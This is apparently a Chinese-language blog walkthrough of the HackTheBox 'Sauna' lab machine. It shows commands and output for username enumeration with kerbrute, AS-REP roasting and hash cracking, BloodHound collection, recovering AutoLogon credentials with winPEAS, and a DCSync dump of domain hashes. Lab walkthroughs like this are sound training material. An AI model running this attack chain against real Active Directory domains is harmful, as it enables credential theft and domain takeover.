HTB-Sauna
|
6
|
0
|
|
HTB-Machine

508 字
|
7 分钟

Box Info

OSWindows
DifficultyEasy

Nmap

[root@kali] /home/kali/Sauna  
❯ nmap Sauna.htb -sV -T4 

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos 
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped

EGOTISTICAL-BANK.LOCAL添加到/etc/hosts

Crack Password

在网页中的about页面发现了一些团队成员

Fergus Smith
Shaun Coins
Hugo Bear 
Bowie Taylor 
Steven Kerb 
Sophie Driver

这里使用一个工具将可能的用户名组合列出

GitHub
urbanadventurer/username-anarchy 
[root@kali] /home/kali/Sauna/username-anarchy (master) ⚡ 
❯ cat usernames.txt 
fergus
fergus.smith
ferguss
fsmith
shaun
shaun.coins
shaunc
scoins
hugo
hugo.bear
hugob
hbear
bowie
bowie.taylor
bowiet
btaylor
steven
steven.kerb
stevenk
skerb
sophie
sophie.driver
sophied
sdriver

使用kerbrute进行尝试是否存在这些用户

[root@kali] /home/kali/Sauna  
❯ ./kerbrute_linux_amd64 userenum -d EGOTISTICAL-BANK.LOCAL usernames.txt --dc EGOTISTICAL-BANK.LOCAL

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1)  Ronnie Flathers @ropnop

  Using KDC(s):
  EGOTISTICAL-BANK.LOCAL:88

  [+] VALID USERNAME:       fsmith@EGOTISTICAL-BANK.LOCAL
  Done! Tested 24 usernames (1 valid) in 1.049 seconds

可以看到只存在一个fsmith,下面看一下是否开启了Kerberos 预身份验证

[root@kali] /home/kali/Sauna  
❯ impacket-GetNPUsers -usersfile usernames.txt -no-pass -dc-ip "10.10.xx.xx" EGOTISTICAL-BANK.LOCAL/                              ⏎

$krb5asrep$23$fSmith@EGOTISTICAL-BANK.LOCAL:2bf051fe5d01a87bb394e35afeb5fb52$9109680d602a2ee95749b1c7c8eb999526aaa633047a593d78442d74949dc97d2b565d61ffee5f92ed51a9aa4486561ad901cd7ade464bed9696a10a40fcccabe87883a59903ac99a03e65c16101bf4083dee0e86691cb2060a29a94c983acc7adf6bc16a1abc6fa3d46cea8eb43a1404446698fe5dxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

使用John the Ripper进行解密

[root@kali] /home/kali/Sauna  
❯ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

xxxxxxxxxxxxx   ($krb5asrep$23$fSmith@EGOTISTICAL-BANK.LOCAL)

最后使用Evil-winrm进行登录拿到user.txt

Privilege Escalation

Bloodhound

SAUNA.EGOTISTICAL-BANK.LOCAL添加到/etc/hosts

[root@kali] /home/kali/Sauna  
❯ bloodhound-python -u fsmith -p "Thestrokes23" -d EGOTISTICAL-BANK.LOCAL -ns 10.10.xx.xx -c All
INFO: Found AD domain: egotistical-bank.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Found 7 users
INFO: Found 52 groups
INFO: Found 3 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Done in 00M 32S

发现一个可以使用DCSync的用户:SVC_LOANMGR

两个用户在一个组内,但是fsmithsvc_loanmgr之间没有直接联系

Winpeas

我这里下载的是winpeasx64.exe

在目标系统上发现了自动登录凭证

ÉÍÍÍÍÍÍÍÍÍ͹ Looking for AutoLogon credentials
    Some AutoLogon credentials were found
    DefaultDomainName             :  EGOTISTICALBANK
    DefaultUserName               :  EGOTISTICALBANK\svc_loanmanager
    DefaultPassword               :  MoneymakesthXXXXXXXXXXX

那么接下来就可以使用DCSync攻击了

DCSync

使用impacket-secretsdump来伪装成DC获取域控上的hash

[root@kali] /home/kali/Sauna  
❯ impacket-secretsdump 'EGOTISTICAL-BANK.local/svc_loanmgr:Moneymakestheworldgoround!'@10.10.xx.xx
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaxxxxxxxxxxx:823452073d75b9dxxxxxxxxxxxxx:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::

通过evil-winrm使用hash登录,拿到root.txt

Summary

User:通过官网上的相关资料尝试爆破用户名,使用工具username-anarchy来获取一些常见的用户名,通过Kerberos的未设置预认证的账户获取到了用户hash进行登录。

RootBloodhound分析可以进行DCSync攻击,但是和当前用户没有关联,只能上传Winpeas查看系统详细信息,获取到了自动登录的密码,进而进行DCSync

HacktheboxWindows
暂无评论

发送评论 编辑评论 


				

			

						

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
							
													

					

				

			

			
			

				

					
				

			

				

											

							
							
						

																				
					
											
						

	

		
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
	

	

		
颜文字
Emoji
小恐龙
花!
	


									

			

			
			
		

	






上一篇
下一篇 

                    

                    
			        推荐文章
		            

		            

							
HTB-Active

							
							

							
HTB-Forest

							
							

							
HTB-Resolute